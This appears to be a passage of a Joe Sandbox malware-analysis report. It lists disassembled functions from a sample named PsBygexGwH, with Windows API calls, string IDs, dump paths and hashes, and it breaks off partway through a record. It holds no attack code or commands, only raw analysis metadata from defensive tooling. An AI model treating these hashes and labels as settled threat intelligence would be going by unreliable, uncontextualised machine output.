                                                          • API String ID: 596671847-2343686810
                                                          • Opcode ID: 45e0e6504629e2dd4851d365410b3add9ff44adc7f84e4ad030dce44b6114cba
                                                          • Instruction ID: 781972ecca4b06841685832290dc35deba3673ff3ac6604b652b1ed055f1f880
                                                          • Opcode Fuzzy Hash: 45e0e6504629e2dd4851d365410b3add9ff44adc7f84e4ad030dce44b6114cba
                                                          • Instruction Fuzzy Hash: 63315071D01219ABCF15EFA4DC85EEE7FB9FF14300F100069F815A6162DB31AA56DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 001B3621
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001B365C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 829cef6df724e74ae0f3d0fd3400422ffb372c2c95239bb0e3516ebbd459d873
                                                          • Instruction ID: dfe589ad1fcbdd43233f6be7c73a19cd3ad33527cf3deb7b8bce95d22c0dee11
                                                          • Opcode Fuzzy Hash: 829cef6df724e74ae0f3d0fd3400422ffb372c2c95239bb0e3516ebbd459d873
                                                          • Instruction Fuzzy Hash: CE319E71110604AEDB24DF28DC80EFB73A9FF98760F008619F9A597290DB31AD91D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 001B461F
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001B4634
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 6ddb27542e125d3eac4295420cf15823ae50e1e7a2da89e8b93b9ba3611a6d14
                                                          • Instruction ID: e769327421d848a2293980bbf49000e5e202a74e697e687c19c194e39916abc0
                                                          • Opcode Fuzzy Hash: 6ddb27542e125d3eac4295420cf15823ae50e1e7a2da89e8b93b9ba3611a6d14
                                                          • Instruction Fuzzy Hash: DD311974A01719AFDF14CFA9C990BEA7BB5FF49300F14806AE905AB352D770A941CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001B327C
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001B3287
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 6cc007db906cee0e07b735102bc676481a6f99752645e869975a039b9f747770
                                                          • Instruction ID: 3c7bb358b7228ec09a722b532d67cc8b40e91571c67d300117e8f20eee6a185b
                                                          • Opcode Fuzzy Hash: 6cc007db906cee0e07b735102bc676481a6f99752645e869975a039b9f747770
                                                          • Instruction Fuzzy Hash: 2211B2713002087FFF259E94DC81EFB376AEB983A4F104268F92897290D7719D6197A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0012600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0012604C
                                                            • Part of subcall function 0012600E: GetStockObject.GDI32(00000011), ref: 00126060
                                                            • Part of subcall function 0012600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012606A
                                                          • GetWindowRect.USER32(00000000,?), ref: 001B377A
                                                          • GetSysColor.USER32(00000012), ref: 001B3794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: d0f5c556eea77c5b298616049e6bdcf286305dd99a349ab4f55e30be2b0a54df
                                                          • Instruction ID: 2519ea942ebe5b0fa94b612d29346e261d0d3222e61cf1f29654bb0eff81a1a1
                                                          • Opcode Fuzzy Hash: d0f5c556eea77c5b298616049e6bdcf286305dd99a349ab4f55e30be2b0a54df
                                                          • Instruction Fuzzy Hash: D9113AB2610209AFDF01DFA8CC45EFA7BB8FB08354F004614F965E2250EB35E861DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0019CD7D
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0019CDA6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 1c0d2e7a66333bf155d631bc247098875157f16a5e8451a07c482ccc6fc790b1
                                                          • Instruction ID: 3d89e3ceab5eb84ec7097a315a1e02c22fbd1e3bb6a1ea9f6f71de9e06cd7645
                                                          • Opcode Fuzzy Hash: 1c0d2e7a66333bf155d631bc247098875157f16a5e8451a07c482ccc6fc790b1
                                                          • Instruction Fuzzy Hash: 7211E9B12056317ADB384BA68C45FF7BEECEF127A4F004236B18983080D7709840D6F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 001B34AB
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001B34BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 233a0c57d009f9b320c6c7822957a10efe9b3a379e6fbac1f670aab1d5bee0cf
                                                          • Instruction ID: 34f194d2f4b4f6db1e041d68d08ced9b04da00cea9c3ff5b36f8dcbe5a77fa57
                                                          • Opcode Fuzzy Hash: 233a0c57d009f9b320c6c7822957a10efe9b3a379e6fbac1f670aab1d5bee0cf
                                                          • Instruction Fuzzy Hash: C1114C71100208AFEB228E68DC84AFB376AEF15778F504724F975971E0C771DDA1ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00186CB6
                                                          • _wcslen.LIBCMT ref: 00186CC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: STOP
                                                          • API String ID: 1256254125-2411985666
                                                          • Opcode ID: 79702c0264cf213b17e27f61b80cc914aef9eda76907344944e0206933e1f880
                                                          • Instruction ID: 26e6f6d827eed9a1b4395703e94907208e2042201380220f1eb09504cb6b1444
                                                          • Opcode Fuzzy Hash: 79702c0264cf213b17e27f61b80cc914aef9eda76907344944e0206933e1f880
                                                          • Instruction Fuzzy Hash: 3F01C4326105268BCB21BFFDDC809BF77A5FB71754B510624E85296190EB31DA50CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00181D4C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 624084870-1403004172
                                                          • Opcode ID: c61962aef6434021a05a85b449809b2c4d1ba8c6d03969cf95acd2ad3407669d
                                                          • Instruction ID: afa74852dde76010a6493aff7c72d0f7149893868877651ceded167787b40480
                                                          • Opcode Fuzzy Hash: c61962aef6434021a05a85b449809b2c4d1ba8c6d03969cf95acd2ad3407669d
                                                          • Instruction Fuzzy Hash: 4B01B576601228ABCB08FBA4DC55DFE7369FB56750F040A1AA832572C1EB305A198BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00181C46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 624084870-1403004172
                                                          • Opcode ID: b96a8b0742f66a973254bd12775ab8367673615c3ad4d9480a1651914e02b075
                                                          • Instruction ID: b08a3bd724af52a3ad91f57c7d4d9386891fa565985f39ee6412a4854e7aa1b7
                                                          • Opcode Fuzzy Hash: b96a8b0742f66a973254bd12775ab8367673615c3ad4d9480a1651914e02b075
                                                          • Instruction Fuzzy Hash: CD01A776A8111877CB08FB94D951DFF77ADAB25740F140019B41667281EB209F199BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00181CC8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 624084870-1403004172
                                                          • Opcode ID: c9df3f20c7c365e438608a7679f4078f944f59e61d378d1e5b79ec8252608e1d
                                                          • Instruction ID: daaca96e6bc86e75cf760890416129e71249685d3f1cfc2eebcc0b92e0094e2e
                                                          • Opcode Fuzzy Hash: c9df3f20c7c365e438608a7679f4078f944f59e61d378d1e5b79ec8252608e1d
                                                          • Instruction Fuzzy Hash: 4A01F9B6B8011877CB04FBA5DA11EFF73ADAB21740F540015B80277281EB609F19DB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA
                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00181DD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 624084870-1403004172
                                                          • Opcode ID: 3e0d9def03b26ebbefea80517ac309334f5d49ec47f74105b34468ccc6bf9863
                                                          • Instruction ID: 046341cec10c43a98572ecaaf23cb175ee43c934b497c0f302c90a80e5d17d23
                                                          • Opcode Fuzzy Hash: 3e0d9def03b26ebbefea80517ac309334f5d49ec47f74105b34468ccc6bf9863
                                                          • Instruction Fuzzy Hash: 50F0A472A4122877DB08F7E8DC56FFE776CAB11750F480A15B822672C1EB605A198B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: 3, 3, 16, 1
                                                          • API String ID: 176396367-3042988571
                                                          • Opcode ID: 4af36cf9bf2a1f5c281537610731853790dd0115f214fc403684a2e2735e4537
                                                          • Instruction ID: 8f82b0d93a5e32117c56cd9afc8b749eff4ebaabd9240fa15287f6b5ae6bed68
                                                          • Opcode Fuzzy Hash: 4af36cf9bf2a1f5c281537610731853790dd0115f214fc403684a2e2735e4537
                                                          • Instruction Fuzzy Hash: 40E02B0A21422011D231127AECC1A7F57CDDFDE750710182BF985C22F6EF948E92A3A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00180B23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 2030045667-4017498283
                                                          • Opcode ID: 0b36dc1185f13372517528134d89db97c47a7180d8eaa2926bf4057d8bb0e500
                                                          • Instruction ID: 3a5c33386958062a1603e4682bd1c003ab232474834998dd982b33a473bef3fb
                                                          • Opcode Fuzzy Hash: 0b36dc1185f13372517528134d89db97c47a7180d8eaa2926bf4057d8bb0e500
                                                          • Instruction Fuzzy Hash: F8E0803224435837D21437957C47FC97B858F19F55F10042AFB58655D38FE2659047E9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0013F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00140D71,?,?,?,0012100A), ref: 0013F7CE
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0012100A), ref: 00140D75
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0012100A), ref: 00140D84
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00140D7F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 55579361-631824599
                                                          • Opcode ID: 8850cf002fa2d75976bf048d296641a0bd223c98801f2bfa83c6ffa2eef67aab
                                                          • Instruction ID: 121d0e81a260060e196195ccee5f27bedfde0f5aad6fdb33a7823166e3963923
                                                          • Opcode Fuzzy Hash: 8850cf002fa2d75976bf048d296641a0bd223c98801f2bfa83c6ffa2eef67aab
                                                          • Instruction Fuzzy Hash: B1E092746003118BD3319FBDE9087927BE1BF18740F004A6DE586C6A61DBB5E489CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: %.3d$X64
                                                          • API String ID: 481472006-1077770165
                                                          • Opcode ID: 9c4f5b862dc3e116b60d8e926c35c401ab2ad2a1b1380fa1d7cc9c1d7ad1f1cb
                                                          • Instruction ID: 8b715349a6116cfde9d8b464d4c4ac1ee79cf0816779de215c4dd4cb2869f563
                                                          • Opcode Fuzzy Hash: 9c4f5b862dc3e116b60d8e926c35c401ab2ad2a1b1380fa1d7cc9c1d7ad1f1cb
                                                          • Instruction Fuzzy Hash: B1D012A1C0810CEACB9896D0EC458BEB37CBF18341F52C452F90AA1041D724C54A6761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001B232C
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001B233F
                                                            • Part of subcall function 0018E97B: Sleep.KERNEL32 ref: 0018E9F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: c87d41dddb943784c9af8dc80b58ee8b873d517f359137d53269cecf6f6139a8
                                                          • Instruction ID: 69a1a8df57e08acf065832c89b5ada8fac07bb2991c74b8b381b776ed3e38f95
                                                          • Opcode Fuzzy Hash: c87d41dddb943784c9af8dc80b58ee8b873d517f359137d53269cecf6f6139a8
                                                          • Instruction Fuzzy Hash: 85D0C9367D4350B6E664B7719C0FFDA7A549B14B14F004A16B685AA1D0DAE0A8818A94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001B236C
                                                          • PostMessageW.USER32(00000000), ref: 001B2373
                                                            • Part of subcall function 0018E97B: Sleep.KERNEL32 ref: 0018E9F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: c2db9fb792587dd2d9468330fdd1f80c523789875752ab40f1d827bf2748e16b
                                                          • Instruction ID: 6d2ace6f09a07131980f4e7d6a90fdbacde3ef2f7f687cf0491bc78c968cbad3
